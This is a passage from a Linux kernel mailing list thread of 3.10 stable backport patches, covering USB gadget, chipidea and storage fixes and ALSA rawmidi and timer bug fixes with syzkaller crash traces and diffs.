must have their completion signalled in a fininte
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."

In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.

Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/u_ether.c | 8 --------
 1 file changed, 8 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index aad066d..ef5c623 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -584,14 +584,6 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,
 
 	req->length = length;
 
-	/* throttle high/super speed IRQ rate back slightly */
-	if (gadget_is_dualspeed(dev->gadget))
-		req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
-				       dev->gadget->speed == USB_SPEED_SUPER)) &&
-					!list_empty(&dev->tx_reqs))
-			? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
-			: 0;
-
 	retval = usb_ep_queue(in, req, GFP_ATOMIC);
 	switch (retval) {
 	default:
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (20 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
                   ` (196 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Peter Chen, Willy Tarreau

From: Peter Chen <peter.chen@nxp.com>

commit a5d906bb261cde5f881a949d3b0fbaa285dcc574 upstream.

This can fix below dump when the lock is accessed at host
mode due to it is not initialized.

[   46.119638] INFO: trying to register non-static key.
[   46.124643] the code is fine but needs lockdep annotation.
[   46.130144] turning off the locking correctness validator.
[   46.135659] CPU: 0 PID: 690 Comm: cat Not tainted 4.9.0-rc3-00079-g4b75f1d #1210
[   46.143075] Hardware name: Freescale i.MX6 SoloX (Device Tree)
[   46.148923] Backtrace:
[   46.151448] [<c010c460>] (dump_backtrace) from [<c010c658>] (show_stack+0x18/0x1c)
[   46.159038]  r7:edf52000
[   46.161412]  r6:60000193
[   46.163967]  r5:00000000
[   46.165035]  r4:c0e25c2c

[   46.169109] [<c010c640>] (show_stack) from [<c03f58a4>] (dump_stack+0xb4/0xe8)
[   46.176362] [<c03f57f0>] (dump_stack) from [<c016d690>] (register_lock_class+0x4fc/0x56c)
[   46.184554]  r10:c0e25d24
[   46.187014]  r9:edf53e70
[   46.189569]  r8:c1642444
[   46.190637]  r7:ee9da024
[   46.193191]  r6:00000000
[   46.194258]  r5:00000000
[   46.196812]  r4:00000000
[   46.199185]  r3:00000001

[   46.203259] [<c016d194>] (register_lock_class) from [<c0171294>] (__lock_acquire+0x80/0x10f0)
[   46.211797]  r10:c0e25d24
[   46.214257]  r9:edf53e70
[   46.216813]  r8:ee9da024
[   46.217880]  r7:c1642444
[   46.220435]  r6:edcd1800
[   46.221502]  r5:60000193
[   46.224057]  r4:00000000

[   46.227953] [<c0171214>] (__lock_acquire) from [<c01726c0>] (lock_acquire+0x74/0x94)
[   46.235710]  r10:00000001
[   46.238169]  r9:edf53e70
[   46.240723]  r8:edf53f80
[   46.241790]  r7:00000001
[   46.244344]  r6:00000001
[   46.245412]  r5:60000193
[   46.247966]  r4:00000000

[   46.251866] [<c017264c>] (lock_acquire) from [<c096c8fc>] (_raw_spin_lock_irqsave+0x40/0x54)
[   46.260319]  r7:ee1c6a00
[   46.262691]  r6:c062a570
[   46.265247]  r5:20000113
[   46.266314]  r4:ee9da014

[   46.270393] [<c096c8bc>] (_raw_spin_lock_irqsave) from [<c062a570>] (ci_port_test_show+0x2c/0x70)
[   46.279280]  r6:eebd2000
[   46.281652]  r5:ee9da010
[   46.284207]  r4:ee9da014

[   46.286810] [<c062a544>] (ci_port_test_show) from [<c0248d04>] (seq_read+0x1ac/0x4f8)
[   46.294655]  r9:edf53e70
[   46.297028]  r8:edf53f80
[   46.299583]  r7:ee1c6a00
[   46.300650]  r6:00000001
[   46.303205]  r5:00000000
[   46.304273]  r4:eebd2000
[   46.306850] [<c0248b58>] (seq_read) from [<c039e864>] (full_proxy_read+0x54/0x6c)
[   46.314348]  r10:00000000
[   46.316808]  r9:c0a6ad30
[   46.319363]  r8:edf53f80
[   46.320430]  r7:00020000
[   46.322986]  r6:b6de3000
[   46.324053]  r5:ee1c6a00
[   46.326607]  r4:c0248b58

[   46.330505] [<c039e810>] (full_proxy_read) from [<c021ec98>] (__vfs_read+0x34/0x118)
[   46.338262]  r9:edf52000
[   46.340635]  r8:c0107fc4
[   46.343190]  r7:00020000
[   46.344257]  r6:edf53f80
[   46.346812]  r5:c039e810
[   46.347879]  r4:ee1c6a00
[   46.350447] [<c021ec64>] (__vfs_read) from [<c021fbd0>] (vfs_read+0x8c/0x11c)
[   46.357597]  r9:edf52000
[   46.359969]  r8:c0107fc4
[   46.362524]  r7:edf53f80
[   46.363592]  r6:b6de3000
[   46.366147]  r5:ee1c6a00
[   46.367214]  r4:00020000
[   46.369782] [<c021fb44>] (vfs_read) from [<c0220a4c>] (SyS_read+0x4c/0xa8)
[   46.376672]  r8:c0107fc4
[   46.379045]  r7:00020000
[   46.381600]  r6:b6de3000
[   46.382667]  r5:ee1c6a00
[   46.385222]  r4:ee1c6a00

[   46.387817] [<c0220a00>] (SyS_read) from [<c0107e20>] (ret_fast_syscall+0x0/0x1c)
[   46.395314]  r7:00000003
[   46.397687]  r6:b6de3000
[   46.400243]  r5:00020000
[   46.401310]  r4:00020000

Fixes: 26c696c678c4 ("USB: Chipidea: rename struct ci13xxx variables from udc to ci")
Signed-off-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/chipidea/core.c | 1 +
 drivers/usb/chipidea/udc.c  | 2 --
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
index 475c9c1..b77badb 100644
--- a/drivers/usb/chipidea/core.c
+++ b/drivers/usb/chipidea/core.c
@@ -381,6 +381,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
 		return -ENOMEM;
 	}
 
+	spin_lock_init(&ci->lock);
 	ci->dev = dev;
 	ci->platdata = dev->platform_data;
 	if (ci->platdata->phy)
diff --git a/drivers/usb/chipidea/udc.c b/drivers/usb/chipidea/udc.c
index f1cab42..45c8ffa 100644
--- a/drivers/usb/chipidea/udc.c
+++ b/drivers/usb/chipidea/udc.c
@@ -1647,8 +1647,6 @@ static int udc_start(struct ci13xxx *ci)
 	struct device *dev = ci->dev;
 	int retval = 0;
 
-	spin_lock_init(&ci->lock);
-
 	ci->gadget.ops          = &usb_gadget_ops;
 	ci->gadget.speed        = USB_SPEED_UNKNOWN;
 	ci->gadget.max_speed    = USB_SPEED_HIGH;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (21 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
                   ` (195 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Petr Vandrovec, Greg Kroah-Hartman, Willy Tarreau

From: Petr Vandrovec <petr@vandrovec.name>

commit 2ce9d2272b98743b911196c49e7af5841381c206 upstream.

Some code (all error handling) submits CDBs that are allocated
on the stack.  This breaks with CB/CBI code that tries to create
URB directly from SCSI command buffer - which happens to be in
vmalloced memory with vmalloced kernel stacks.

Let's make copy of the command in usb_stor_CB_transport.

Signed-off-by: Petr Vandrovec <petr@vandrovec.name>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/storage/transport.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/storage/transport.c b/drivers/usb/storage/transport.c
index b1d815e..8988b26 100644
--- a/drivers/usb/storage/transport.c
+++ b/drivers/usb/storage/transport.c
@@ -919,10 +919,15 @@ int usb_stor_CB_transport(struct scsi_cmnd *srb, struct us_data *us)
 
 	/* COMMAND STAGE */
 	/* let's send the command via the control pipe */
+	/*
+	 * Command is sometime (f.e. after scsi_eh_prep_cmnd) on the stack.
+	 * Stack may be vmallocated.  So no DMA for us.  Make a copy.
+	 */
+	memcpy(us->iobuf, srb->cmnd, srb->cmd_len);
 	result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe,
 				      US_CBI_ADSC, 
 				      USB_TYPE_CLASS | USB_RECIP_INTERFACE, 0, 
-				      us->ifnum, srb->cmnd, srb->cmd_len);
+				      us->ifnum, us->iobuf, srb->cmd_len);
 
 	/* check the return code for the command */
 	usb_stor_dbg(us, "Call to usb_stor_ctrl_transfer() returned %d\n",
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (22 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
                   ` (194 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit 816f318b2364262a51024096da7ca3b84e78e3b5 upstream.

When a seq-virmidi driver is initialized, it registers a rawmidi
instance with its callback to create an associated seq kernel client.
Currently it's done throughly in rawmidi's register_mutex context.
Recently it was found that this may lead to a deadlock another rawmidi
device that is being attached with the sequencer is accessed, as both
open with the same register_mutex.  This was actually triggered by
syzkaller, as Dmitry Vyukov reported:

======================================================
 [ INFO: possible circular locking dependency detected ]
 4.8.0-rc1+ #11 Not tainted
 -------------------------------------------------------
 syz-executor/7154 is trying to acquire lock:
  (register_mutex#5){+.+.+.}, at: [<ffffffff84fd6d4b>] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341

 but task is already holding lock:
  (&grp->list_mutex){++++.+}, at: [<ffffffff850138bb>] check_and_subscribe_port+0x5b/0x5c0 sound/core/seq/seq_ports.c:495

 which lock already depends on the new lock.

 the existing dependency chain (in reverse order) is:

 -> #1 (&grp->list_mutex){++++.+}:
    [<ffffffff8147a3a8>] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746
    [<ffffffff863f6199>] down_read+0x49/0xc0 kernel/locking/rwsem.c:22
    [<     inline     >] deliver_to_subscribers sound/core/seq/seq_clientmgr.c:681
    [<ffffffff85005c5e>] snd_seq_deliver_event+0x35e/0x890 sound/core/seq/seq_clientmgr.c:822
    [<ffffffff85006e96>] > snd_seq_kernel_client_dispatch+0x126/0x170 sound/core/seq/seq_clientmgr.c:2418
    [<ffffffff85012c52>] snd_seq_system_broadcast+0xb2/0xf0 sound/core/seq/seq_system.c:101
    [<ffffffff84fff70a>] snd_seq_create_kernel_client+0x24a/0x330 sound/core/seq/seq_clientmgr.c:2297
    [<     inline     >] snd_virmidi_dev_attach_seq sound/core/seq/seq_virmidi.c:383
    [<ffffffff8502d29f>] snd_virmidi_dev_register+0x29f/0x750 sound/core/seq/seq_virmidi.c:450
    [<ffffffff84fd208c>] snd_rawmidi_dev_register+0x30c/0xd40 sound/core/rawmidi.c:1645
    [<ffffffff84f816d3>] __snd_device_register.part.0+0x63/0xc0 sound/core/device.c:164
    [<     inline     >] __snd_device_register sound/core/device.c:162
    [<ffffffff84f8235d>] snd_device_register_all+0xad/0x110 sound/core/device.c:212
    [<ffffffff84f7546f>] snd_card_register+0xef/0x6c0 sound/core/init.c:749
    [<ffffffff85040b7f>] snd_virmidi_probe+0x3ef/0x590 sound/drivers/virmidi.c:123
    [<ffffffff833ebf7b>] platform_drv_probe+0x8b/0x170 drivers/base/platform.c:564
    ......

 -> #0 (register_mutex#5){+.+.+.}:
    [<     inline     >] check_prev_add kernel/locking/lockdep.c:1829
    [<     inline     >] check_prevs_add kernel/locking/lockdep.c:1939
    [<     inline     >] validate_chain kernel/locking/lockdep.c:2266
    [<ffffffff814791f4>] __lock_acquire+0x4d44/0x4d80 kernel/locking/lockdep.c:3335
    [<ffffffff8147a3a8>] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746
    [<     inline     >] __mutex_lock_common kernel/locking/mutex.c:521
    [<ffffffff863f0ef1>] mutex_lock_nested+0xb1/0xa20 kernel/locking/mutex.c:621
    [<ffffffff84fd6d4b>] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341
    [<ffffffff8502e7c7>] midisynth_subscribe+0xf7/0x350 sound/core/seq/seq_midi.c:188
    [<     inline     >] subscribe_port sound/core/seq/seq_ports.c:427
    [<ffffffff85013cc7>] check_and_subscribe_port+0x467/0x5c0 sound/core/seq/seq_ports.c:510
    [<ffffffff85015da9>] snd_seq_port_connect+0x2c9/0x500 sound/core/seq/seq_ports.c:579
    [<ffffffff850079b8>] snd_seq_ioctl_subscribe_port+0x1d8/0x2b0 sound/core/seq/seq_clientmgr.c:1480
    [<ffffffff84ffe9e4>] snd_seq_do_ioctl+0x184/0x1e0 sound/core/seq/seq_clientmgr.c:2225
    [<ffffffff84ffeae8>] snd_seq_kernel_client_ctl+0xa8/0x110 sound/core/seq/seq_clientmgr.c:2440
    [<ffffffff85027664>] snd_seq_oss_midi_open+0x3b4/0x610 sound/core/seq/oss/seq_oss_midi.c:375
    [<ffffffff85023d67>] snd_seq_oss_synth_setup_midi+0x107/0x4c0 sound/core/seq/oss/seq_oss_synth.c:281
    [<ffffffff8501b0a8>] snd_seq_oss_open+0x748/0x8d0 sound/core/seq/oss/seq_oss_init.c:274
    [<ffffffff85019d8a>] odev_open+0x6a/0x90 sound/core/seq/oss/seq_oss.c:138
    [<ffffffff84f7040f>] soundcore_open+0x30f/0x640 sound/sound_core.c:639
    ......

 other info that might help us debug this:

 Possible unsafe locking scenario:

        CPU0                    CPU1
        ----                    ----
   lock(&grp->list_mutex);
                                lock(register_mutex#5);
                                lock(&grp->list_mutex);
   lock(register_mutex#5);

 *** DEADLOCK ***
======================================================

The fix is to simply move the registration parts in
snd_rawmidi_dev_register() to the outside of the register_mutex lock.
The lock is needed only to manage the linked list, and it's not
necessarily to cover the whole initialization process.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/rawmidi.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 500765f..3e97616 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -1564,10 +1564,12 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 	}
 	list_add_tail(&rmidi->list, &snd_rawmidi_devices);
 	sprintf(name, "midiC%iD%i", rmidi->card->number, rmidi->device);
+	mutex_unlock(&register_mutex);
 	if ((err = snd_register_device(SNDRV_DEVICE_TYPE_RAWMIDI,
 				       rmidi->card, rmidi->device,
 				       &snd_rawmidi_f_ops, rmidi, name)) < 0) {
 		snd_printk(KERN_ERR "unable to register rawmidi device %i:%i\n", rmidi->card->number, rmidi->device);
+		mutex_lock(&register_mutex);
 		list_del(&rmidi->list);
 		mutex_unlock(&register_mutex);
 		return err;
@@ -1575,6 +1577,7 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 	if (rmidi->ops && rmidi->ops->dev_register &&
 	    (err = rmidi->ops->dev_register(rmidi)) < 0) {
 		snd_unregister_device(SNDRV_DEVICE_TYPE_RAWMIDI, rmidi->card, rmidi->device);
+		mutex_lock(&register_mutex);
 		list_del(&rmidi->list);
 		mutex_unlock(&register_mutex);
 		return err;
@@ -1603,7 +1606,6 @@ static int snd_rawmidi_dev_register(struct snd_device *device)
 		}
 	}
 #endif /* CONFIG_SND_OSSEMUL */
-	mutex_unlock(&register_mutex);
 	sprintf(name, "midi%d", rmidi->device);
 	entry = snd_info_create_card_entry(rmidi->card, name, rmidi->card->proc_root);
 	if (entry) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (23 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
                   ` (193 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, Takashi Iwai, Jiri Slaby, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 11749e086b2766cccf6217a527ef5c5604ba069c upstream.

I got this with syzkaller:

    ==================================================================
    BUG: KASAN: null-ptr-deref on address 0000000000000020
    Read of size 32 by task syz-executor/22519
    CPU: 1 PID: 22519 Comm: syz-executor Not tainted 4.8.0-rc2+ #169
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2
    014
     0000000000000001 ffff880111a17a00 ffffffff81f9f141 ffff880111a17a90
     ffff880111a17c50 ffff880114584a58 ffff880114584a10 ffff880111a17a80
     ffffffff8161fe3f ffff880100000000 ffff880118d74a48 ffff880118d74a68
    Call Trace:
     [<ffffffff81f9f141>] dump_stack+0x83/0xb2
     [<ffffffff8161fe3f>] kasan_report_error+0x41f/0x4c0
     [<ffffffff8161ff74>] kasan_report+0x34/0x40
     [<ffffffff82c84b54>] ? snd_timer_user_read+0x554/0x790
     [<ffffffff8161e79e>] check_memory_region+0x13e/0x1a0
     [<ffffffff8161e9c1>] kasan_check_read+0x11/0x20
     [<ffffffff82c84b54>] snd_timer_user_read+0x554/0x790
     [<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
     [<ffffffff817d0831>] ? proc_fault_inject_write+0x1c1/0x250
     [<ffffffff817d0670>] ? next_tgid+0x2a0/0x2a0
     [<ffffffff8127c278>] ? do_group_exit+0x108/0x330
     [<ffffffff8174653a>] ? fsnotify+0x72a/0xca0
     [<ffffffff81674dfe>] __vfs_read+0x10e/0x550
     [<ffffffff82c84600>] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0
     [<ffffffff81674cf0>] ? do_sendfile+0xc50/0xc50
     [<ffffffff81745e10>] ? __fsnotify_update_child_dentry_flags+0x60/0x60
     [<ffffffff8143fec6>] ? kcov_ioctl+0x56/0x190
     [<ffffffff81e5ada2>] ? common_file_perm+0x2e2/0x380
     [<ffffffff81746b0e>] ? __fsnotify_parent+0x5e/0x2b0
     [<ffffffff81d93536>] ? security_file_permission+0x86/0x1e0
     [<ffffffff816728f5>] ? rw_verify_area+0xe5/0x2b0
     [<ffffffff81675355>] vfs_read+0x115/0x330
     [<ffffffff81676371>] SyS_read+0xd1/0x1a0
     [<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
     [<ffffffff82001c2c>] ? __this_cpu_preempt_check+0x1c/0x20
     [<ffffffff8150455a>] ? __context_tracking_exit.part.4+0x3a/0x1e0
     [<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff810052fc>] ? syscall_return_slowpath+0x16c/0x1d0
     [<ffffffff83c3276a>] entry_SYSCALL64_slow_path+0x25/0x25
    ==================================================================

There are a couple of problems that I can see:

 - ioctl(SNDRV_TIMER_IOCTL_SELECT), which potentially sets
   tu->queue/tu->tqueue to NULL on memory allocation failure, so read()
   would get a NULL pointer dereference like the above splat

 - the same ioctl() can free tu->queue/to->tqueue which means read()
   could potentially see (and dereference) the freed pointer

We can fix both by taking the ioctl_lock mutex when dereferencing
->queue/->tqueue, since that's always held over all the ioctl() code.

Just looking at the code I find it likely that there are more problems
here such as tu->qhead pointing outside the buffer if the size is
changed concurrently using SNDRV_TIMER_IOCTL_PARAMS.

[js] unlock in fail paths

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index 3476895..f5ddc9b 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -1922,19 +1922,23 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
 		if (err < 0)
 			goto _error;
 
+		mutex_lock(&tu->ioctl_lock);
 		if (tu->tread) {
 			if (copy_to_user(buffer, &tu->tqueue[tu->qhead++],
 					 sizeof(struct snd_timer_tread))) {
+				mutex_unlock(&tu->ioctl_lock);
 				err = -EFAULT;
 				goto _error;
 			}
 		} else {
 			if (copy_to_user(buffer, &tu->queue[tu->qhead++],
 					 sizeof(struct snd_timer_read))) {
+				mutex_unlock(&tu->ioctl_lock);
 				err = -EFAULT;
 				goto _error;
 			}
 		}
+		mutex_unlock(&tu->ioctl_lock);
 
 		tu->qhead %= tu->queue_size;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (24 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
                   ` (192 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Vegard Nossum, Takashi Iwai, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 6b760bb2c63a9e322c0e4a0b5daf335ad93d5a33 upstream.

I got this:

    divide error: 0000 [#1] PREEMPT SMP KASAN
    CPU: 1 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #189
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
    task: ffff8801120a9580 task.stack: ffff8801120b0000
    RIP: 0010:[<ffffffff82c8bd9a>]  [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
    RSP: 0018:ffff88011aa87da8  EFLAGS: 00010006
    RAX: 0000000000004f76 RBX: ffff880112655e88 RCX: 0000000000000000
    RDX: 0000000000000000 RSI: ffff880112655ea0 RDI: 0000000000000001
    RBP: ffff88011aa87e00 R08: ffff88013fff905c R09: ffff88013fff9048
    R10: ffff88013fff9050 R11: 00000001050a7b8c R12: ffff880114778a00
    R13: ffff880114778ab4 R14: ffff880114778b30 R15: 0000000000000000
    FS:  00007f071647c700(0000) GS:ffff88011aa80000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000000000603001 CR3: 0000000112021000 CR4: 00000000000006e0
    Stack:
     0000000000000000 ffff880114778ab8 ffff880112655ea0 0000000000004f76
     ffff880112655ec8 ffff880112655e80 ffff880112655e88 ffff88011aa98fc0
     00000000b97ccf2b dffffc0000000000 ffff88011aa98fc0 ffff88011aa87ef0
    Call Trace:
     <IRQ>
     [<ffffffff813abce7>] __hrtimer_run_queues+0x347/0xa00
     [<ffffffff82c8bbc0>] ? snd_hrtimer_close+0x130/0x130
     [<ffffffff813ab9a0>] ? retrigger_next_event+0x1b0/0x1b0
     [<ffffffff813ae1a6>] ? hrtimer_interrupt+0x136/0x4b0
     [<ffffffff813ae220>] hrtimer_interrupt+0x1b0/0x4b0
     [<ffffffff8120f91e>] local_apic_timer_interrupt+0x6e/0xf0
     [<ffffffff81227ad3>] ? kvm_guest_apic_eoi_write+0x13/0xc0
     [<ffffffff83c35086>] smp_apic_timer_interrupt+0x76/0xa0
     [<ffffffff83c3416c>] apic_timer_interrupt+0x8c/0xa0
     <EOI>
     [<ffffffff83c3239c>] ? _raw_spin_unlock_irqrestore+0x2c/0x60
     [<ffffffff82c8185d>] snd_timer_start1+0xdd/0x670
     [<ffffffff82c87015>] snd_timer_continue+0x45/0x80
     [<ffffffff82c88100>] snd_timer_user_ioctl+0x1030/0x2830
     [<ffffffff8159f3a0>] ? __follow_pte.isra.49+0x430/0x430
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff815a26fa>] ? do_wp_page+0x3aa/0x1c90
     [<ffffffff815aa4f8>] ? handle_mm_fault+0xbc8/0x27f0
     [<ffffffff815a9930>] ? __pmd_alloc+0x370/0x370
     [<ffffffff82c870d0>] ? snd_timer_pause+0x80/0x80
     [<ffffffff816b0733>] do_vfs_ioctl+0x193/0x1050
     [<ffffffff816b05a0>] ? ioctl_preallocate+0x200/0x200
     [<ffffffff81002f2f>] ? syscall_trace_enter+0x3cf/0xdb0
     [<ffffffff815045ba>] ? __context_tracking_exit.part.4+0x9a/0x1e0
     [<ffffffff81002b60>] ? exit_to_usermode_loop+0x190/0x190
     [<ffffffff82001a97>] ? check_preemption_disabled+0x37/0x1e0
     [<ffffffff81d93889>] ? security_file_ioctl+0x89/0xb0
     [<ffffffff816b167f>] SyS_ioctl+0x8f/0xc0
     [<ffffffff816b15f0>] ? do_vfs_ioctl+0x1050/0x1050
     [<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
     [<ffffffff83c32b2a>] entry_SYSCALL64_slow_path+0x25/0x25
    Code: e8 fc 42 7b fe 8b 0d 06 8a 50 03 49 0f af cf 48 85 c9 0f 88 7c 01 00 00 48 89 4d a8 e8 e0 42 7b fe 48 8b 45 c0 48 8b 4d a8 48 99 <48> f7 f9 49 01 c7 e8 cb 42 7b fe 48 8b 55 d0 48 b8 00 00 00 00
    RIP  [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
     RSP <ffff88011aa87da8>
    ---[ end trace 6aa380f756a21074 ]---

The problem happens when you call ioctl(SNDRV_TIMER_IOCTL_CONTINUE) on a
completely new/unused timer -- it will have ->sticks == 0, which causes a
divide by 0 in snd_hrtimer_callback().

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/core/timer.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index f5ddc9b..f297eac 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -817,6 +817,7 @@ int snd_timer_new(struct snd_card *card, char *id, struct snd_timer_id *tid,
 	timer->tmr_subdevice = tid->subdevice;
 	if (id)
 		strlcpy(timer->id, id, sizeof(timer->id));
+	timer->sticks = 1;
 	INIT_LIST_HEAD(&timer->device_list);
 	INIT_LIST_HEAD(&timer->open_list_head);
 	INIT_LIST_HEAD(&timer->active_list_head);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
